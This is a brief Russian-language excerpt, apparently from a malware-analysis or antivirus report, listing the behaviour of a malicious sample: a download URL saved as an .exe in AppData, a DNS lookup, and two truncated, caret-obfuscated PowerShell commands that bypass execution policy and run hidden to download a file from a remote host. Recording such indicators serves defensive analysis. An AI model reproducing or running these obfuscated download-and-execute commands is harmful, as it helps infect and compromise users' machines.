Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWe^R^sh^e^Ll.e^xE -EXEcUT^iO^Np^oLiCy^ ^BYPAsS -^n^o^P^rOF^iL^E ^-^W^iN^D^O^WSTY^lE ^H^iDD^en (^nE^W-^objec^t ^sySTE^M^.NE^t.^wE^Bc^l^ieN^t)^.^do^wNloA^DFIlE('http://smoeroot...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "poWe^R^sh^e^Ll.e^xE -EXEcUT^iO^Np^oLiCy^ ^BYPAsS -^n^o^P^rOF^iL^E ^-^W^iN^D^O^WSTY^lE ^H^iDD^en (^nE^W-^objec^t ^sySTE^M^.NE^t.^wE^Bc^l^ieN^t)^.^do^wNloA^DFIlE('http://smoeroot...' (со скрытым окном)